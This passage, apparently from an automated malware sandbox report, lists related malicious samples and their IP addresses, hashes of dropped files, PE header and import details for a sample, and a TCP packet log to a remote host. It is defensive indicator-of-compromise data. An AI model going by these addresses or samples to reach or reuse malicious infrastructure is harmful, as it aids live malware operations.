                                                    • 172.67.188.70
                                                    R2axoid4If.exeGet hashmaliciousBrowse
                                                    • 172.67.188.70
                                                    x9rKinpIYb.exeGet hashmaliciousBrowse
                                                    • 172.67.188.70
                                                    fcBCfIrYKl.exeGet hashmaliciousBrowse
                                                    • 172.67.188.70
                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    TUT-ASUSQqU4yi6bv8.exeGet hashmaliciousBrowse
                                                    • 208.95.112.1
                                                    file.exeGet hashmaliciousBrowse
                                                    • 208.95.112.1
                                                    file.exeGet hashmaliciousBrowse
                                                    • 208.95.112.1
                                                    SecuriteInfo.com.Trojan.DownLoader45.9818.8758.2030.exeGet hashmaliciousBrowse
                                                    • 208.95.112.1
                                                    file.exeGet hashmaliciousBrowse
                                                    • 208.95.112.1
                                                    file.exeGet hashmaliciousBrowse
                                                    • 208.95.112.1
                                                    file.exeGet hashmaliciousBrowse
                                                    • 208.95.112.1
                                                    BF9714F60C2B4B43CC0383B3155D9C737271916032051.exeGet hashmaliciousBrowse
                                                    • 208.95.112.1
                                                    file.exeGet hashmaliciousBrowse
                                                    • 208.95.112.1
                                                    file.exeGet hashmaliciousBrowse
                                                    • 208.95.112.1
                                                    file.exeGet hashmaliciousBrowse
                                                    • 208.95.112.1
                                                    file.exeGet hashmaliciousBrowse
                                                    • 208.95.112.1
                                                    file.exeGet hashmaliciousBrowse
                                                    • 208.95.112.1
                                                    file.exeGet hashmaliciousBrowse
                                                    • 208.95.112.1
                                                    NoCry.bin.exeGet hashmaliciousBrowse
                                                    • 208.95.112.1
                                                    OSGpNfwWMh.exeGet hashmaliciousBrowse
                                                    • 208.95.112.1
                                                    BpG12M3con.exeGet hashmaliciousBrowse
                                                    • 208.95.112.1
                                                    file.exeGet hashmaliciousBrowse
                                                    • 208.95.112.1
                                                    file.exeGet hashmaliciousBrowse
                                                    • 208.95.112.1
                                                    file.exeGet hashmaliciousBrowse
                                                    • 208.95.112.1
                                                    CLOUDFLARENETUSsM6UPyyNir.exeGet hashmaliciousBrowse
                                                    • 188.114.96.3
                                                    https://zordoo-my.sharepoint.com/:o:/g/personal/vedran_hasanovic_ecspower_hr/Ev0W6OyD2BBMhYamp2oNJCABgpDt4UN1mfGVLq9TVcw01g?e=5lyIXiGet hashmaliciousBrowse
                                                    • 188.114.97.3
                                                    X3L8oTPlgl.exeGet hashmaliciousBrowse
                                                    • 104.19.184.120
                                                    fMPmDTlN15.exeGet hashmaliciousBrowse
                                                    • 188.114.97.3
                                                    ORDINE OF2022192_pdf .exeGet hashmaliciousBrowse
                                                    • 162.159.134.233
                                                    63Zb6ecED8.exeGet hashmaliciousBrowse
                                                    • 104.19.185.120
                                                    gWG8IWTQvp.elfGet hashmaliciousBrowse
                                                    • 8.47.122.17
                                                    Benefit.htmlGet hashmaliciousBrowse
                                                    • 104.18.10.207
                                                    Benefit.htmlGet hashmaliciousBrowse
                                                    • 104.18.10.207
                                                    tGawAEY26l.exeGet hashmaliciousBrowse
                                                    • 188.114.97.3
                                                    mips.elfGet hashmaliciousBrowse
                                                    • 104.27.128.162
                                                    54825820012022,pdf.exeGet hashmaliciousBrowse
                                                    • 162.159.130.233
                                                    6sfNp0TMe9.exeGet hashmaliciousBrowse
                                                    • 188.114.96.3
                                                    glenn.duncan.shtmlGet hashmaliciousBrowse
                                                    • 188.114.97.3
                                                    https://t.co/redirect?url=https%3A%2F%2Fspacewatch.global%2F2022%2F08%2Fsolaris-a-step-toward-making-space-based-solar-power-a-european-reality&t=1+1661679632805&cn=ZmxleGlibGVfcmVjcw%3D%3D&sig=a01febba107c1d99756da1da7cc877582bc02bbd&iid=69c83bf9cd8449b2b8c86fdf4803152a&uid=65470604&nid=244+285413392Get hashmaliciousBrowse
                                                    • 172.64.156.26
                                                    https://cloud.3dissue.net/40647/40525/40968/78110/index.html?67329Get hashmaliciousBrowse
                                                    • 104.18.11.207
                                                    application.xlsxGet hashmaliciousBrowse
                                                    • 104.18.28.243
                                                    application.xlsxGet hashmaliciousBrowse
                                                    • 104.17.25.14
                                                    https://sites.google.com/view/lsks44211/excel-onlineGet hashmaliciousBrowse
                                                    • 104.26.7.10
                                                    l8YrDt0zS5.exeGet hashmaliciousBrowse
                                                    • 188.114.96.3
                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    ce5f3254611a8c095a3d821d44539877file.exeGet hashmaliciousBrowse
                                                    • 104.21.40.196
                                                    file.exeGet hashmaliciousBrowse
                                                    • 104.21.40.196
                                                    3478HAQ46s.exeGet hashmaliciousBrowse
                                                    • 104.21.40.196
                                                    file.exeGet hashmaliciousBrowse
                                                    • 104.21.40.196
                                                    file.exeGet hashmaliciousBrowse
                                                    • 104.21.40.196
                                                    application.xlsxGet hashmaliciousBrowse
                                                    • 104.21.40.196
                                                    HCUKW2YfsG.exeGet hashmaliciousBrowse
                                                    • 104.21.40.196
                                                    HCUKW2YfsG.exeGet hashmaliciousBrowse
                                                    • 104.21.40.196
                                                    Universiti _Malaya_1.docx.docGet hashmaliciousBrowse
                                                    • 104.21.40.196
                                                    pr03OfboM8.lnkGet hashmaliciousBrowse
                                                    • 104.21.40.196
                                                    file.exeGet hashmaliciousBrowse
                                                    • 104.21.40.196
                                                    file.exeGet hashmaliciousBrowse
                                                    • 104.21.40.196
                                                    file.exeGet hashmaliciousBrowse
                                                    • 104.21.40.196
                                                    file.exeGet hashmaliciousBrowse
                                                    • 104.21.40.196
                                                    BF9714F60C2B4B43CC0383B3155D9C737271916032051.exeGet hashmaliciousBrowse
                                                    • 104.21.40.196
                                                    Passport and ID details for Booking.xlsxGet hashmaliciousBrowse
                                                    • 104.21.40.196
                                                    file.exeGet hashmaliciousBrowse
                                                    • 104.21.40.196
                                                    file.exeGet hashmaliciousBrowse
                                                    • 104.21.40.196
                                                    file.exeGet hashmaliciousBrowse
                                                    • 104.21.40.196
                                                    BpG12M3con.exeGet hashmaliciousBrowse
                                                    • 104.21.40.196
                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    C:\Users\user\AppData\Local\Temp\db.dllfile.exeGet hashmaliciousBrowse
                                                      file.exeGet hashmaliciousBrowse
                                                        file.exeGet hashmaliciousBrowse
                                                          file.exeGet hashmaliciousBrowse
                                                            file.exeGet hashmaliciousBrowse
                                                              file.exeGet hashmaliciousBrowse
                                                                file.exeGet hashmaliciousBrowse
                                                                  R2axoid4If.exeGet hashmaliciousBrowse
                                                                    x9rKinpIYb.exeGet hashmaliciousBrowse
                                                                      fcBCfIrYKl.exeGet hashmaliciousBrowse
                                                                        n7BcSmkxd4.exeGet hashmaliciousBrowse
                                                                          OkbEuAbPVe.exeGet hashmaliciousBrowse
                                                                            1DHOc1acXH.exeGet hashmaliciousBrowse
                                                                              EDa3BsiRFM.exeGet hashmaliciousBrowse
                                                                                Y3sZUTYrPw.exeGet hashmaliciousBrowse
                                                                                  lUKKUgVut8.exeGet hashmaliciousBrowse
                                                                                    file.exeGet hashmaliciousBrowse
                                                                                      file.exeGet hashmaliciousBrowse
                                                                                        file.exeGet hashmaliciousBrowse
                                                                                          file.exeGet hashmaliciousBrowse
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005
                                                                                            Category:dropped
                                                                                            Size (bytes):49152
                                                                                            Entropy (8bit):0.7876734657715041
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                                                            MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                                                            SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                                                            SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                                                            SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                                                            Malicious:true
                                                                                            Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005
                                                                                            Category:dropped
                                                                                            Size (bytes):28672
                                                                                            Entropy (8bit):1.4755077381471955
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:oesz0Rwhba5DX1tHQOd0AS4mcAMmgAU7MxTWbKSS:o+RwE55tHQOKB4mcmgAU7MxTWbNS
                                                                                            MD5:DEE86123FE48584BA0CE07793E703560
                                                                                            SHA1:E80D87A2E55A95BC937AC24525E51AE39D635EF7
                                                                                            SHA-256:60DB12643ECF5B13E6F05E0FBC7E0453D073E0929412E39428D431DB715122C8
                                                                                            SHA-512:65649B808C7AB01A65D18BF259BF98A4E395B091D17E49849573275B7B93238C3C9D1E5592B340ABCE3195F183943CA8FB18C1C6C2B5974B04FE99FCCF582BFB
                                                                                            Malicious:true
                                                                                            Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):571230
                                                                                            Entropy (8bit):7.964579681710588
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:FV1e0UgkVT6ZT+3JCnoxgLSoCXwbePLJrH8fwpZ:FV1edgkV8T0CnoxX4ePLJTMwpZ
                                                                                            MD5:6F5100F5D8D2943C6501864C21C45542
                                                                                            SHA1:AD0BD5D65F09EA329D6ABB665EF74B7D13060EA5
                                                                                            SHA-256:6CBBC3FD7776BA8B5D2F4E6E33E510C7E71F56431500FE36DA1DA06CE9D8F177
                                                                                            SHA-512:E4F8287FC8EBCCC31A805E8C4CF71FEFE4445C283E853B175930C29A8B42079522EF35F1C478282CF10C248E4D6F2EBDAF1A7C231CDE75A7E84E76BAFCAA42D4
                                                                                            Malicious:false
                                                                                            Preview:P,..Hh.j...?...O}3..8v,)cml.T/.....V.r.....n.?y..oz#V......N.{.....!....Y."..)v.T.........Ub.V..*.)..8..,.%.{4.yWrA.a36&..,...V...l9.y....39.y...wW.j.ox.....I..;..%..p.b..>..j.....j..awT..r...j....o./.7...,=uk..i../h..j*j.P.j..?.-X.k..R}.j.5.b-F.k..c........j...j..Q?...).qe......,o'k.....j.J..))O.......k..\.....u,..k...,..k....k...tOT.X.jXe-.k..7.k...83U.......%..o.....Y%.....7.F.(j...KP..I..j..y...o..no......z......u/..DJP.e+.Dj..Z....k.......j$T.X.j[..`....o....k{..2|6...H.....c%..........z......~^..j.-s.....o.-........6.L.`.j.-s.....i|..y.Q'....k...}FT.X.jY..Y....o......y..=|6..%..z/........s....>.j.-s.k../.:..........>|/...h...2/..R..-......k....9.y.....j.6Z.j.o....l&..%.UD..`....&..t>".6g..j,..../W=..5...n.......X..h>.k..'...|/h..jfDX.S...`&*...Y....)U]bc[......'(..l..+....b.i....[...If!S...r......i.....Q^..*.....aeddT.`.'....*.[.h....e...?>....n....5......-..j..T..ow......k....-...k16.+i(~..L....j,...c.L./w=j...~./
                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):61440
                                                                                            Entropy (8bit):5.463972317214072
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:WDKKrolwgA7W2cz1Pii4A1yZHtVtQg0eBU:KKPi2Fii4TrtQg0e
                                                                                            MD5:4D11BD6F3172584B3FDA0E9EFCAF0DDB
                                                                                            SHA1:0581C7F087F6538A1B6D4F05D928C1DF24236944
                                                                                            SHA-256:73314490C80E5EB09F586E12C1F035C44F11AEAA41D2F4B08ACA476132578930
                                                                                            SHA-512:6A023496E7EE03C2FF8E3BA445C7D7D5BFE6A1E1E1BAE5C17DCF41E78EDE84A166966579BF8CC7BE7450D2516F869713907775E863670B10EB60C092492D2D04
                                                                                            Malicious:false
                                                                                            Joe Sandbox View:
                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                            • Filename: R2axoid4If.exe, Detection: malicious, Browse
                                                                                            • Filename: x9rKinpIYb.exe, Detection: malicious, Browse
                                                                                            • Filename: fcBCfIrYKl.exe, Detection: malicious, Browse
                                                                                            • Filename: n7BcSmkxd4.exe, Detection: malicious, Browse
                                                                                            • Filename: OkbEuAbPVe.exe, Detection: malicious, Browse
                                                                                            • Filename: 1DHOc1acXH.exe, Detection: malicious, Browse
                                                                                            • Filename: EDa3BsiRFM.exe, Detection: malicious, Browse
                                                                                            • Filename: Y3sZUTYrPw.exe, Detection: malicious, Browse
                                                                                            • Filename: lUKKUgVut8.exe, Detection: malicious, Browse
                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........)a..H..H..H..r.H..a.H..b..H..oGR.H..H...H..}.H..u.H..w.H..Rich.H..........PE..L....^.c...........!.....p...p..........................................................................................b.......(........&.......................................................... ...@............................................text....g.......p.................. ..`.rdata........... ..................@..@.data...............................@....rsrc....0.......0..................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):2
                                                                                            Entropy (8bit):1.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:y:y
                                                                                            MD5:81051BCC2CF1BEDF378224B0A93E2877
                                                                                            SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                                                                            SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                                                                            SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                                                                            Malicious:false
                                                                                            Preview:..
                                                                                            File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                            Entropy (8bit):6.234215186280302
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                            File name:file.exe
                                                                                            File size:86016
                                                                                            MD5:2ef8da551cf5ab2ab6e3514321791eab
                                                                                            SHA1:d618d2d2b8f272f75f1e89cb2023ea6a694b7773
                                                                                            SHA256:50691a77e2b8153d8061bd35d9280c0e69175196cdcf876203ccecf8bcfd7c19
                                                                                            SHA512:3073ed8a572a955ba120e2845819afe9e13d226879db7a0cd98752fd3e336a57baf17a97a38f94412eeb500fd0a0c8bac55fdbdfef2c7cbf970a7091cdfc0e00
                                                                                            SSDEEP:1536:S97iRkxTeSbKR0IlzUMp9ok6avzYc/Zt60tNd6:SRiSxbbq59PxT60tNd6
                                                                                            TLSH:B6836C2538C3C0B3F4460935D5948AD55BFF6D137AE6546FFFA8068E1AA02C8067BAF1
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........I............%........d.......d.......d......%................d.......d......Rich............................PE..L....r.c...
                                                                                            Icon Hash:00828e8e8686b000
                                                                                            Entrypoint:0x4021f4
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows cui
                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                            DLL Characteristics:
                                                                                            Time Stamp:0x631172D5 [Fri Sep 2 03:04:53 2022 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:4
                                                                                            OS Version Minor:0
                                                                                            File Version Major:4
                                                                                            File Version Minor:0
                                                                                            Subsystem Version Major:4
                                                                                            Subsystem Version Minor:0
                                                                                            Import Hash:62ece4054893d325aa81d145d92fe428
                                                                                            Instruction
                                                                                            call 00007F3EC4A7540Ch
                                                                                            jmp 00007F3EC4A717D6h
                                                                                            push ebp
                                                                                            mov ebp, esp
                                                                                            sub esp, 00000328h
                                                                                            mov dword ptr [004134A8h], eax
                                                                                            mov dword ptr [004134A4h], ecx
                                                                                            mov dword ptr [004134A0h], edx
                                                                                            mov dword ptr [0041349Ch], ebx
                                                                                            mov dword ptr [00413498h], esi
                                                                                            mov dword ptr [00413494h], edi
                                                                                            mov word ptr [004134C0h], ss
                                                                                            mov word ptr [004134B4h], cs
                                                                                            mov word ptr [00413490h], ds
                                                                                            mov word ptr [0041348Ch], es
                                                                                            mov word ptr [00413488h], fs
                                                                                            mov word ptr [00413484h], gs
                                                                                            pushfd
                                                                                            pop dword ptr [004134B8h]
                                                                                            mov eax, dword ptr [ebp+00h]
                                                                                            mov dword ptr [004134ACh], eax
                                                                                            mov eax, dword ptr [ebp+04h]
                                                                                            mov dword ptr [004134B0h], eax
                                                                                            lea eax, dword ptr [ebp+08h]
                                                                                            mov dword ptr [004134BCh], eax
                                                                                            mov eax, dword ptr [ebp-00000320h]
                                                                                            mov dword ptr [004133F8h], 00010001h
                                                                                            mov eax, dword ptr [004134B0h]
                                                                                            mov dword ptr [004133ACh], eax
                                                                                            mov dword ptr [004133A0h], C0000409h
                                                                                            mov dword ptr [004133A4h], 00000001h
                                                                                            mov eax, dword ptr [0041205Ch]
                                                                                            mov dword ptr [ebp-00000328h], eax
                                                                                            mov eax, dword ptr [00412060h]
                                                                                            mov dword ptr [ebp-00000324h], eax
                                                                                            call dword ptr [0040F064h]
                                                                                            Programming Language:
                                                                                            • [ASM] VS2005 build 50727
                                                                                            • [C++] VS2005 build 50727
                                                                                            • [ C ] VS2005 build 50727
                                                                                            • [LNK] VS2005 build 50727
                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x117540x50.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000xb0.rsrc
                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x10e600x40.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0xf0000x180.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                            .text0x10000xdf1c0xe000False0.6217912946428571data6.7105100953014105IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                            .rdata0xf0000x2ed60x3000False0.3732096354166667data5.528203310119003IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .data0x120000x34e40x2000False0.21240234375data2.297840462561381IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .rsrc0x160000xb00x1000False0.041015625data3.0564690017788276IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            NameRVASizeTypeLanguageCountry
                                                                                            RT_MANIFEST0x160580x56ASCII text, with CRLF line terminatorsEnglishUnited States
                                                                                            DLLImport
                                                                                            KERNEL32.dllMultiByteToWideChar, InterlockedDecrement, GetProcAddress, LoadLibraryA, GetEnvironmentVariableW, lstrcatW, LocalFree, lstrlenA, GetThreadLocale, CreateFileA, SetStdHandle, WriteConsoleW, GetConsoleOutputCP, WriteConsoleA, CloseHandle, SetFilePointer, GetLastError, HeapFree, GetVersionExA, HeapAlloc, GetProcessHeap, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapDestroy, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, RaiseException, GetModuleHandleA, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, GetModuleFileNameW, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSection, Sleep, RtlUnwind, HeapSize, GetCPInfo, GetACP, GetOEMCP, WideCharToMultiByte, InterlockedExchange, GetConsoleCP, GetConsoleMode, FlushFileBuffers, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA
                                                                                            USER32.dllFindWindowA
                                                                                            OLEAUT32.dllSafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayGetDim, VariantCopy, VariantClear, VariantInit, SysAllocStringByteLen, SysStringByteLen, SysAllocString, SysFreeString, SysAllocStringLen, GetErrorInfo
                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                            EnglishUnited States
                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Sep 2, 2022 11:02:33.563636065 CEST49753443192.168.2.3104.21.40.196
                                                                                            Sep 2, 2022 11:02:33.563697100 CEST44349753104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:33.563788891 CEST49753443192.168.2.3104.21.40.196
                                                                                            Sep 2, 2022 11:02:33.622575045 CEST49753443192.168.2.3104.21.40.196
                                                                                            Sep 2, 2022 11:02:33.622623920 CEST44349753104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:33.674956083 CEST44349753104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:33.675055027 CEST49753443192.168.2.3104.21.40.196
                                                                                            Sep 2, 2022 11:02:33.677175045 CEST49753443192.168.2.3104.21.40.196
                                                                                            Sep 2, 2022 11:02:33.677195072 CEST44349753104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:33.677539110 CEST44349753104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:33.733084917 CEST49753443192.168.2.3104.21.40.196
                                                                                            Sep 2, 2022 11:02:34.050565004 CEST49753443192.168.2.3104.21.40.196
                                                                                            Sep 2, 2022 11:02:34.091389894 CEST44349753104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:34.550684929 CEST44349753104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:34.550802946 CEST44349753104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:34.550890923 CEST44349753104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:34.550968885 CEST49753443192.168.2.3104.21.40.196
                                                                                            Sep 2, 2022 11:02:34.551028967 CEST44349753104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:34.551105022 CEST49753443192.168.2.3104.21.40.196
                                                                                            Sep 2, 2022 11:02:34.551117897 CEST44349753104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:34.551212072 CEST44349753104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:34.551274061 CEST44349753104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:34.551326990 CEST49753443192.168.2.3104.21.40.196
                                                                                            Sep 2, 2022 11:02:34.551332951 CEST44349753104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:34.551393032 CEST49753443192.168.2.3104.21.40.196
                                                                                            Sep 2, 2022 11:02:34.551443100 CEST44349753104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:34.551549911 CEST44349753104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:34.551606894 CEST44349753104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:34.551634073 CEST49753443192.168.2.3104.21.40.196
                                                                                            Sep 2, 2022 11:02:34.551642895 CEST44349753104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:34.551697969 CEST49753443192.168.2.3104.21.40.196
                                                                                            Sep 2, 2022 11:02:34.778835058 CEST44349753104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:34.778923988 CEST44349753104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:34.778985023 CEST44349753104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:34.779063940 CEST49753443192.168.2.3104.21.40.196
                                                                                            Sep 2, 2022 11:02:34.779082060 CEST44349753104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:34.779120922 CEST44349753104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:34.779131889 CEST49753443192.168.2.3104.21.40.196
                                                                                            Sep 2, 2022 11:02:34.779134989 CEST49753443192.168.2.3104.21.40.196
                                                                                            Sep 2, 2022 11:02:34.779174089 CEST44349753104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:34.779221058 CEST49753443192.168.2.3104.21.40.196
                                                                                            Sep 2, 2022 11:02:34.779228926 CEST44349753104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:34.781478882 CEST44349753104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:34.781523943 CEST44349753104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:34.781557083 CEST44349753104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:34.781620979 CEST49753443192.168.2.3104.21.40.196
                                                                                            Sep 2, 2022 11:02:34.781632900 CEST44349753104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:34.781672001 CEST49753443192.168.2.3104.21.40.196
                                                                                            Sep 2, 2022 11:02:34.783380985 CEST44349753104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:34.783421040 CEST44349753104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:34.783451080 CEST44349753104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:34.783516884 CEST49753443192.168.2.3104.21.40.196
                                                                                            Sep 2, 2022 11:02:34.783525944 CEST44349753104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:34.783581018 CEST49753443192.168.2.3104.21.40.196
                                                                                            Sep 2, 2022 11:02:34.784940004 CEST44349753104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:34.784976959 CEST44349753104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:34.785013914 CEST44349753104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:34.785026073 CEST49753443192.168.2.3104.21.40.196
                                                                                            Sep 2, 2022 11:02:34.785037041 CEST44349753104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:34.785087109 CEST49753443192.168.2.3104.21.40.196
                                                                                            Sep 2, 2022 11:02:34.825567961 CEST49753443192.168.2.3104.21.40.196
                                                                                            Sep 2, 2022 11:02:34.825613976 CEST44349753104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:35.013366938 CEST44349753104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:35.013444901 CEST44349753104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:35.013469934 CEST49753443192.168.2.3104.21.40.196
                                                                                            Sep 2, 2022 11:02:35.013489962 CEST44349753104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:35.013545990 CEST49753443192.168.2.3104.21.40.196
                                                                                            Sep 2, 2022 11:02:35.013555050 CEST44349753104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:35.013658047 CEST44349753104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:35.013700008 CEST49753443192.168.2.3104.21.40.196
                                                                                            Sep 2, 2022 11:02:35.013710022 CEST44349753104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:35.013730049 CEST44349753104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:35.013781071 CEST49753443192.168.2.3104.21.40.196
                                                                                            Sep 2, 2022 11:02:35.013787985 CEST44349753104.21.40.196192.168.2.3
